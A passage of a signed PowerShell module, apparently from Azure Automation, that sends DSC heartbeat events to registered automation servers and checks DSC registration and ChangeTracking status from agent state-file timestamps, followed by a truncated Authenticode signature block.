properties $heartbeatInfo = Get-HeartbeatInfo $serverUrls = $heartbeatInfo["ServerUrls"] if(!$serverUrls) { Write-Verbose "[ERROR] No AA Server URLs were returned with glcm ..." Write-Verbose "[ERROR] No heartbeat sent ..." return } else { for ($i = 0; $i -lt $serverUrls.Count; $i++) { if(-not $serverUrls.ToLower().Contains('agentservice')) { Write-Verbose "[ERROR] Node is not registered to AA Server. Server URI : $serverUrls ..." Write-Verbose "[ERROR] No heartbeat sent ..." return } } } $extnInfo = @{ Name = "Microsoft.Powershell.DSC" Version = "2.77.0.0" } # Get OS Profile $osProfile = Get-OSProfile # Get OMS cloud if $omsCloudId = '7783-7084-3265-9085-8269-3286-77' # Create request payload $payload = @{ OMSCloudId = $omsCloudId TimeStamp = (Get-Date -UFormat '%Y%m%d-%H%M%S') VMResourceId = "" ExtensionStatusEvent = $Event ExtensionInformation = $extnInfo OSProfile = $osProfile LCMMetaData = $heartbeatInfo["RegistrationMetaData"] } # For each server that VM is registered to, send heartbeat request to AA foreach($serverURL in $serverUrls) { Send-HeartbeatRequest -ServerURL $serverURL -Payload $payload } } catch { Write-Verbose "[ERROR] occurred while sending heartbeat event: $Event ... $_" } } <# .Synopsis Verify if DSC is enabled #> function Test-AutomationDscRegistration { [CmdletBinding()] param( ) try { if((Get-module PSDesiredStateConfiguration -ListAvailable -Verbose:$false) -eq $null) { Write-Verbose "[ERROR] DSC is not installed ..." -Verbose exit 1 } # Get dsc local configuration manager properties $heartbeatInfo = Get-HeartbeatInfo $serverUrls = $heartbeatInfo["ServerUrls"] if(!$serverUrls) { Write-Verbose "[ERROR] No AA Server URLs were returned with glcm ..." -Verbose exit 1 } else { $foundUrl = $false for ($i = 0; $i -lt $serverUrls.Count; $i++) { if($serverUrls.ToLower().Contains('agentsvc')) { $foundUrl = $true Write-Verbose "DSC is registered to pull server ..." -Verbose exit 0 } } } } catch { Write-Verbose "[ERROR] occurred ... $_" -Verbose } Write-Verbose "[ERROR] No AA Server URLs were returned with glcm ..." -Verbose exit 1 } function IsFileOlderThanOneHour { [CmdletBinding()] param( [String] $Path ) $lastWrite = (get-item $Path).LastWriteTime $timespan = New-TimeSpan -Days 0 -Hours 1 -Minutes 0 if (((Get-Date) - $lastWrite) -lt $timespan) { return $false } return $true } <# .Synopsis Verify if ChangeTracking/Inventory is enabled ChangeTracking solution saves the inventory and changetracking states under '$env:ProgramFiles\Microsoft Monitoring Agent\Agent\Health Service State\CT*' or '$env:ProgramFiles\Microsoft Monitoring Agent\Agent\Health Service State\FCT*' locations. this functions checks when these state files are modified. if the state files are modified recently (within an hour) then this is considered as the solution is enabled otherwise disabled. #> function Test-ChangeTrackingEnabled { [CmdletBinding()] param( ) try { $mmaServiceStateFolder = Join-Path $env:ProgramFiles 'Microsoft Monitoring Agent\Agent\Health Service State' if(-not(Test-Path $mmaServiceStateFolder)) { Write-Verbose "$mmaServiceStateFolder does not exist" exit 1 } $changeTrackingFolder = Get-ChildItem "$mmaServiceStateFolder\CT*" if($changeTrackingFolder -ne $null) { $chWorkFolder = "$changeTrackingFolder\work" $serviceInventoryFile = "$chWorkFolder\ServiceInventory\ServiceInventory.json" $serviceStateFile = "$chWorkFolder\ServiceState\ServiceState.json" if(Test-Path $serviceInventoryFile) { if(-not(IsFileOlderThanOneHour -Path $serviceInventoryFile)) { Write-Verbose "ChangeTracking is enabled" exit 0 } } if(Test-Path $serviceStateFile) { if(-not(IsFileOlderThanOneHour -Path $serviceStateFile)) { Write-Verbose "ChangeTracking is enabled" exit 0 } } } $fileCTFolder = Get-ChildItem "$mmaServiceStateFolder\FCT*" if($fileCTFolder -ne $null) { $fctWorkFolder = "$fileCTFolder\work" $changedFilesFile = "$fctWorkFolder\ChangedFiles\localhost.json" $changeTrackingFile = "$fctWorkFolder\localhost.json" $inventoryFile = "$fctWorkFolder\Inventory\localhost.json" if(Test-Path $changedFilesFile) { if(-not(IsFileOlderThanOneHour -Path $changedFilesFile)) { Write-Verbose "ChangeTracking is enabled" exit 0 } } if(Test-Path $changeTrackingFile) { if(-not(IsFileOlderThanOneHour -Path $changeTrackingFile)) { Write-Verbose "ChangeTracking is enabled" exit 0 } } if(Test-Path $inventoryFile) { if(-not(IsFileOlderThanOneHour -Path $inventoryFile)) { Write-Verbose "ChangeTracking is enabled" exit 0 } } } } catch { Write-Verbose "[ERROR] occurred ... $_" -Verbose } Write-Verbose "ChangeTracking is not enabled ..." -Verbose exit 1 } Export-ModuleMember -Function @('Send-Heartbeat','Test-AutomationDscRegistration', 'Test-ChangeTrackingEnabled') # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDEi08uUxmuV/k+ # eFo9XbeS5D+NnbKbBMmE5ssq40SCKaCCDXYwggX0MIID3KADAgECAhMzAAADrzBA # DkyjTQVBAAAAAAOvMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMxMTE2MTkwOTAwWhcNMjQxMTE0MTkwOTAwWjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDOS8s1ra6f0YGtg0OhEaQa/t3Q+q1MEHhWJhqQVuO5amYXQpy8MDPNoJYk+FWA # hePP5LxwcSge5aen+f5Q6WNPd6EDxGzotvVpNi5ve0H97S3F7C/axDfKxyNh21MG # 0W8Sb0vxi/vorcLHOL9i+t2D6yvvDzLlEefUCbQV/zGCBjXGlYJcUj6RAzXyeNAN # xSpKXAGd7Fh+ocGHPPphcD9LQTOJgG7Y7aYztHqBLJiQQ4eAgZNU4ac6+8LnEGAL # go1ydC5BJEuJQjYKbNTy959HrKSu7LO3Ws0w8jw6pYdC1IMpdTkk2puTgY2PDNzB # tLM4evG7FYer3WX+8t1UMYNTAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQURxxxNPIEPGSO8kqz+bgCAQWGXsEw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # MBQGA1UEBRMNMjMwMDEyKzUwMTgyNjAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci # tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG # CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu # Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0 # MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAISxFt/zR2frTFPB45Yd # mhZpB2nNJoOoi+qlgcTlnO4QwlYN1w/vYwbDy/oFJolD5r6FMJd0RGcgEM8q9TgQ # 2OC7gQEmhweVJ7yuKJlQBH7P7Pg5RiqgV3cSonJ+OM4kFHbP3gPLiyzssSQdRuPY # 1mIWoGg9i7Y4ZC8ST7WhpSyc0pns2XsUe1XsIjaUcGu7zd7gg97eCUiLRdVklPmp # XobH9CEAWakRUGNICYN2AgjhRTC4j3KJfqMkU04R6Toyh4/Toswm1uoDcGr5laYn # TfcX3u5WnJqJLhuPe8Uj9kGAOcyo0O1mNwDa+LhFEzB6CB32+wfJMumfr6degvLT # e8x55urQLeTjimBQgS49BSUkhFN7ois3cZyNpnrMca5AZaC7pLI72vuqSsSlLalG # OcZmPHZGYJqZ0BacN274OZ80Q8B11iNokns9Od348bMb5Z4fihxaBWebl8kWEi2O # PvQImOAeq3nt7UWJBzJYLAGEpfasaA3ZQgIcEXdD+uwo6ymMzDY6UamFOfYqYWXk # ntxDGu7ngD2ugKUuccYKJJRiiz+LAUcj90BVcSHRLQop9N8zoALr/1sJuwPrVAtx # HNEgSW+AKBqIxYWM4Ev32l6agSUAezLMbq5f3d8x9qzT031jMDT+sUAoCw0M5wVt # CUQcqINPuYjbS1WgJyZIiEkBMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq # hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x # EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv # bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5 # IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG # EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG # A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg # Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC # CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03 # a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr # rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg # OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy # 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9 # sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh # dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k # A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB # w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn # Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90 # lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w # ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o # ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD # VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa # BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny # bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG # AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t # L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV # HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG # AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl # AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb # C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l # hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6 # I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0 # wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560 # STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam # ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa # J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah # XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA # 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt # Y5E90Z1WTk+/gFcioXgRMiF670EKsT/7qMykXcGhiJtXcVZOSEXAQsmbdlsKgEhr # /Xmfwb1tbWrJUnMTDXpQzTGCGZ8wghmbAgEBMIGVMH4xCzAJBgNVBAYTAlVTMRMw # EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVN # aWNyb3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNp # Z25pbmcgUENBIDIwMTECEzMAAAOvMEAOTKNNBUEAAAAAA68wDQYJYIZIAWUDBAIB # BQCgga4wGQYJKoZIhvcNAQkDMQwGCisGAQQBgjcCAQQwHAYKKwYBBAGCNwIBCzEO # MAwGCisGAQQBgjcCARUwLwYJKoZIhvcNAQkEMSIEIL5+n+JMdZ50mpD1HGFaizpL # LsNtiYBwj2i4vCIuf9wLMEIGCisGAQQBgjcCAQwxNDAyoBSAEgBNAGkAYwByAG8A # cwBvAGYAdKEagBhodHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20wDQYJKoZIhvcNAQEB # BQAEggEAfTNNPf55vLMUy/tiMRB7v/PIXG2ZpgD/yk0tTGjq57/NbR+bbtHW/6my # 011gqy+GHl2hRgE/2u4rNbqurCeUYR/fgXulGYrjMcluV0HSR9fFeX7lDd++BsdI # gorjlW+IVGPe5CIY2EcGyRvsfCB3Hv/ekWn1SqsjNzT/ZuxaTmYwJdt1XbPT7fiV # fQfFxHDjpk5dC/oQIleeIqUEPk9Yuva8Sqm3650vc4uojEVG8uM4IDAI/LvwIGTS # urwtat7Y73NSQmGTKOxuJxVJoDr4RIlURdaSi0xRtGQgoDDPr/xNDb3E8nunL0vB # pjFQGmEFkyiK1F+K4HORbxR4yOJKoqGCFykwghclBgorBgEEAYI3AwMBMYIXFTCC # FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFYBgsq # hkiG9w0BCRABBKCCAUcEggFDMIIBPwIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl # AwQCAQUABCAyUe7VwGLBox2bq0c5tS4CsgVQPqWOGH/L7qqysIXn3wIGZpe3cZo3 # GBIyMDI0MDgwMTIxMzU0Mi44OVowBIACAfSggdikgdUwgdIxCzAJBgNVBAYTAlVT # MRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQK # ExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVs # YW5kIE9wZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVzIFRTUyBFU046 # MDg0Mi00QkU2LUMyOUExJTAjBgNVBAMTHE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNl # cnZpY2WgghF5MIIHJzCCBQ+gAwIBAgITMwAAAdqO1claANERsQABAAAB2jANBgkq # hkiG9w0BAQsFADB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQ # MA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9u # MSYwJAYDVQQDEx1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDAeFw0yMzEw # MTIxOTA2NTlaFw0yNTAxMTAxOTA2NTlaMIHSMQswCQYDVQQGEwJVUzETMBEGA1UE # CBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9z # b2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJlbGFuZCBPcGVy # YXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNOOjA4NDItNEJF # Ni1DMjlBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2aWNlMIIC # IjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAk5AGCHa1UVHWPyNADg0N/xtx # WtdI3TzQI0o9JCjtLnuwKc9TQUoXjvDYvqoe3CbgScKUXZyu5cWn+Xs+kxCDbkTt # fzEOa/GvwEETqIBIA8J+tN5u68CxlZwliHLumuAK4F/s6J1emCxbXLynpWzuwPZq # 6n/S695jF5eUq2w+MwKmUeSTRtr4eAuGjQnrwp2OLcMzYrn3AfL3Gu2xgr5f16ts # MZnaaZffvrlpLlDv+6APExWDPKPzTImfpQueScP2LiRRDFWGpXV1z8MXpQF67N+6 # SQx53u2vNQRkxHKVruqG/BR5CWDMJCGlmPP7OxCCleU9zO8Z3SKqvuUALB9UaiDm # mUjN0TG+3VMDwmZ5/zX1pMrAfUhUQjBgsDq69LyRF0DpHG8xxv/+6U2Mi4Zx7LKQ # wBcTKdWssb1W8rit+sKwYvePfQuaJ26D6jCtwKNBqBiasaTWEHKReKWj1gHxDLLl # DUqEa4frlXfMXLxrSTBsoFGzxVHge2g9jD3PUN1wl9kE7Z2HNffIAyKkIabpKa+a # 9q9GxeHLzTmOICkPI36zT9vuizbPyJFYYmToz265Pbj3eAVX/0ksaDlgkkIlcj7L # GQ785edkmy4a3T7NYt0dLhchcEbXug+7kqwV9FMdESWhHZ0jobBprEjIPJIdg628 # jJ2Vru7iV+d8KNj+opMCAwEAAaOCAUkwggFFMB0GA1UdDgQWBBShfI3JUT1mE5WL # MRRXCE2Avw9fRTAfBgNVHSMEGDAWgBSfpxVdAF5iXYP05dJlpxtTNRnpcjBfBgNV # HR8EWDBWMFSgUqBQhk5odHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL2Ny # bC9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIwMjAxMCgxKS5jcmwwbAYI # KwYBBQUHAQEEYDBeMFwGCCsGAQUFBzAChlBodHRwOi8vd3d3Lm1pY3Jvc29mdC5j # b20vcGtpb3BzL2NlcnRzL01pY3Jvc29mdCUyMFRpbWUtU3RhbXAlMjBQQ0ElMjAy # MDEwKDEpLmNydDAMBgNVHRMBAf8EAjAAMBYGA1UdJQEB/wQMMAoGCCsGAQUFBwMI # MA4GA1UdDwEB/wQEAwIHgDANBgkqhkiG9w0BAQsFAAOCAgEAuYNV1O24jSMAS3jU # 7Y4zwJTbftMYzKGsavsXMoIQVpfG2iqT8g5tCuKrVxodWHa/K5DbifPdN04G/uty # z+qc+M7GdcUvJk95pYuw24BFWZRWLJVheNdgHkPDNpZmBJxjwYovvIaPJauHvxYl # SCHusTX7lUPmHT/quz10FGoDMj1+FnPuymyO3y+fHnRYTFsFJIfut9psd6d2l6pt # OZb9F9xpP4YUixP6DZ6PvBEoir9CGeygXyakU08dXWr9Yr+sX8KGi+SEkwO+Wq0R # NaL3saiU5IpqZkL1tiBw8p/Pbx53blYnLXRW1D0/n4L/Z058NrPVGZ45vbspt6CF # rRJ89yuJN85FW+o8NJref03t2FNjv7j0jx6+hp32F1nwJ8g49+3C3fFNfZGExkkJ # WgWVpsdy99vzitoUzpzPkRiT7HVpUSJe2ArpHTGfXCMxcd/QBaVKOpGTO9KdErMW # xnASXvhVqGUpWEj4KL1FP37oZzTFbMnvNAhQUTcmKLHn7sovwCsd8Fj1QUvPiydu # gntCKncgANuRThkvSJDyPwjGtrtpJh9OhR5+Zy3d0zr19/gR6HYqH02wqKKmHnz0 # Cn/FLWMRKWt+Mv+D9luhpLl31rZ8Dn3ya5sO8sPnHk8/fvvTS+b9j48iGanZ9O+5 # Layd15kGbJOpxQ0dE2YKT6eNXecwggdxMIIFWaADAgECAhMzAAAAFcXna54Cm0mZ # AAAAAAAVMA0GCSqGSIb3DQEBCwUAMIGIMQswCQYDVQQGEwJVUzETMBEGA1UECBMK # V2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 # IENvcnBvcmF0aW9uMTIwMAYDVQQDEylNaWNyb3NvZnQgUm9vdCBDZXJ0aWZpY2F0 # ZSBBdXRob3JpdHkgMjAxMDAeFw0yMTA5MzAxODIyMjVaFw0zMDA5MzAxODMyMjVa # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMIICIjANBgkqhkiG9w0BAQEF # AAOCAg8AMIICCgKCAgEA5OGmTOe0ciELeaLL1yR5vQ7VgtP97pwHB9KpbE51yMo1 # V/YBf2xK4OK9uT4XYDP/XE/HZveVU3Fa4n5KWv64NmeFRiMMtY0Tz3cywBAY6GB9 # alKDRLemjkZrBxTzxXb1hlDcwUTIcVxRMTegCjhuje3XD9gmU3w5YQJ6xKr9cmmv # Haus9ja+NSZk2pg7uhp7M62AW36MEBydUv626GIl3GoPz130/o5Tz9bshVZN7928 # jaTjkY+yOSxRnOlwaQ3KNi1wjjHINSi947SHJMPgyY9+tVSP3PoFVZhtaDuaRr3t # pK56KTesy+uDRedGbsoy1cCGMFxPLOJiss254o2I5JasAUq7vnGpF1tnYN74kpEe # HT39IM9zfUGaRnXNxF803RKJ1v2lIH1+/NmeRd+2ci/bfV+AutuqfjbsNkz2K26o # ElHovwUDo9Fzpk03dJQcNIIP8BDyt0cY7afomXw/TNuvXsLz1dhzPUNOwTM5TI4C # vEJoLhDqhFFG4tG9ahhaYQFzymeiXtcodgLiMxhy16cg8ML6EgrXY28MyTZki1ug # poMhXV8wdJGUlNi5UPkLiWHzNgY1GIRH29wb0f2y1BzFa/ZcUlFdEtsluq9QBXps # xREdcu+N+VLEhReTwDwV2xo3xwgVGD94q0W29R6HXtqPnhZyacaue7e3PmriLq0C # AwEAAaOCAd0wggHZMBIGCSsGAQQBgjcVAQQFAgMBAAEwIwYJKwYBBAGCNxUCBBYE # FCqnUv5kxJq+gpE8RjUpzxD/LwTuMB0GA1UdDgQWBBSfpxVdAF5iXYP05dJlpxtT # NRnpcjBcBgNVHSAEVTBTMFEGDCsGAQQBgjdMg30BATBBMD8GCCsGAQUFBwIBFjNo # dHRwOi8vd3d3Lm1pY3Jvc29mdC5jb20vcGtpb3BzL0RvY3MvUmVwb3NpdG9yeS5o # dG0wEwYDVR0lBAwwCgYIKwYBBQUHAwgwGQYJKwYBBAGCNxQCBAweCgBTAHUAYgBD # AEEwCwYDVR0PBAQDAgGGMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAU1fZW # y4/oolxiaNE9lJBb186aGMQwVgYDVR0fBE8wTTBLoEmgR4ZFaHR0cDovL2NybC5t # aWNyb3NvZnQuY29tL3BraS9jcmwvcHJvZHVjdHMvTWljUm9vQ2VyQXV0XzIwMTAt # MDYtMjMuY3JsMFoGCCsGAQUFBwEBBE4wTDBKBggrBgEFBQcwAoY+aHR0cDovL3d3 # dy5taWNyb3NvZnQuY29tL3BraS9jZXJ0cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0y # My5jcnQwDQYJKoZIhvcNAQELBQADggIBAJ1VffwqreEsH2cBMSRb4Z5yS/ypb+pc # FLY+TkdkeLEGk5c9MTO1OdfCcTY/2mRsfNB1OW27DzHkwo/7bNGhlBgi7ulmZzpT # Td2YurYeeNg2LpypglYAA7AFvonoaeC6Ce5732pvvinLbtg/SHUB2RjebYIM9W0j # VOR4U3UkV7ndn/OOPcbzaN9l9qRWqveVtihVJ9AkvUCgvxm2EhIRXT0n4ECWOKz3 # +SmJw7wXsFSFQrP8DJ6LGYnn8AtqgcKBGUIZUnWKNsIdw2FzLixre24/LAl4FOmR # sqlb30mjdAy87JGA0j3mSj5mO0+7hvoyGtmW9I/2kQH2zsZ0/fZMcm8Qq3UwxTSw # ethQ/gpY3UA8x1RtnWN0SCyxTkctwRQEcb9k+SS+c23Kjgm9swFXSVRk2XPXfx5b # RAGOWhmRaw2fpCjcZxkoJLo4S5pu+yFUa2pFEUep8beuyOiJXk+d0tBMdrVXVAmx # aQFEfnyhYWxz/gq77EFmPWn9y8FBSX5+k77L+DvktxW/tM4+pTFRhLy/AsGConsX # HRWJjXD+57XQKBqJC4822rpM+Zv/Cuk0+CQ1ZyvgDbjmjJnW4SLq8CdCPSWU5nR0 # W2rRnj7tfqAxM328y+l7vzhwRNGQ8cirOoo6CGJ/2XBjU02N7oJtpQUQwXEGahC0 # HVUzWLOhcGbyoYIC1TCCAj4CAQEwggEAoYHYpIHVMIHSMQswCQYDVQQGEwJVUzET # MBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UEChMV # TWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJlbGFu # ZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNOOjA4 # NDItNEJFNi1DMjlBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBTZXJ2 # aWNloiMKAQEwBwYFKw4DAhoDFQBCoh8hiWMdRs2hjT/COFdGf+xIDaCBgzCBgKR+ # MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdS # ZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAkBgNVBAMT # HU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwMA0GCSqGSIb3DQEBBQUAAgUA # 6lX6hTAiGA8yMDI0MDgwMTIwMTM1N1oYDzIwMjQwODAyMjAxMzU3WjB1MDsGCisG # AQQBhFkKBAExLTArMAoCBQDqVfqFAgEAMAcCAQACAk7WMAgCAQACAwClYjAKAgUA # 6ldMBQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID # B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAFbivb64frP4Kuy5wzER # B50HkmxLbrf67ncU+l+c8HvNg/cRG+cRv9RVjAVzBOdmV3Sa1li1euxLhV4hIp4t # VhsouNskweqhqUEP+uPBK3bLCcmRV6yxpfpkDn30bi+fhJ4R3oawWmY7tXCWHwv1 # N2vGFE2zuQTl/cJcNUe2CGiDMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx # EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT # FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt # U3RhbXAgUENBIDIwMTACEzMAAAHajtXJWgDREbEAAQAAAdowDQYJYIZIAWUDBAIB # BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx # IgQgAhzl2fXGZcPS8wkiF8roN+kUQtvONl5xq4A7R8fZQfgwgfoGCyqGSIb3DQEJ # EAIvMYHqMIHnMIHkMIG9BCAipaNpYsDvnqTe95Dj1C09020I5ljibrW/ndICOxg9 # xjCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw # DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x # JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB2o7V # yVoA0RGxAAEAAAHaMCIEIKJWlvcjz6eUsCSdcCqzDZnXCRYZwC/gAAQI2WuEF2mv # MA0GCSqGSIb3DQEBCwUABIICAG4W4WLTJgx/b56VNAgUVAJL7ZosZEH0+PNjF+1N # 